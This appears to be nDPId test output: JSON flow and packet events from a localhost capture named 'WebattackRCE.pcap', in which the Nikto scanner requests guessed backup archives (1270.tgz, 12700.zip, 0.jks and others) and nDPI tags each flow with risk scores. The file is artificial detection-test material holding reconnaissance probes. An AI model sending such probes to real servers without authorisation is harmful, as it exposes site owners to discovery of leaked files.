-00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277189,"pkt":"AAAAAAAAAAAAAAAACABFAADAxaRAAEAGdpF\/AAABfwAAAcQOH5BgW\/00es\/TMYAYAED+tAAAAQEICp1m\/O2dZvztR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277190,"pkt":"AAAAAAAAAAAAAAAACABFAADACFhAAEAGM95\/AAABfwAAAcQQH5AQPjDI+venWYAYAED+tAAAAQEICp1m\/O6dZvzuR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277193,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hYJAAEAGtrZ\/AAABfwAAAcQSH5Cznr0TB99xxoAYAED+sQAAAQEICp1m\/PGdZvzwR0VUIC8wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277194,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JiRAAEAGFhV\/AAABfwAAAcQUH5CXxR6x507sMoAYAED+sQAAAQEICp1m\/PKdZvzyR0VUIC8wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277196,"pkt":"AAAAAAAAAAAAAAAACABFAADASbJAAEAG8oN\/AAABfwAAAcQWH5DgxXEkcLyXoIAYAED+tAAAAQEICp1m\/PSdZvz0R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277198,"pkt":"AAAAAAAAAAAAAAAACABFAADAjLtAAEAGr3p\/AAABfwAAAcQYH5DOSLQrVcLjaIAYAED+tAAAAQEICp1m\/PadZvz2R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277200,"pkt":"AAAAAAAAAAAAAAAACABFAADFaNRAAEAG01x\/AAABfwAAAcQaH5BzoVBHI7Wyn4AYAED+uQAAAQEICp1m\/PidZvz4R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277201,"pkt":"AAAAAAAAAAAAAAAACABFAADFz59AAEAGbJF\/AAABfwAAAcQcH5D4h\/cKGx\/I\/4AYAED+uQAAAQEICp1m\/PmdZvz5R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277203,"pkt":"AAAAAAAAAAAAAAAACABFAADBfg5AAEAGviZ\/AAABfwAAAcQeH5A6WEaZ3wpBiYAYAED+tQAAAQEICp1m\/PudZvz7R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277204,"pkt":"AAAAAAAAAAAAAAAACABFAADBsIBAAEAGi7R\/AAABfwAAAcQgH5BX0ojsod\/7v4AYAED+tQAAAQEICp1m\/PydZvz8R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277206,"pkt":"AAAAAAAAAAAAAAAACABFAADEp6FAAEAGlJB\/AAABfwAAAcQiH5DXnp8L7+WKyYAYAED+uAAAAQEICp1m\/P6dZvz+R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 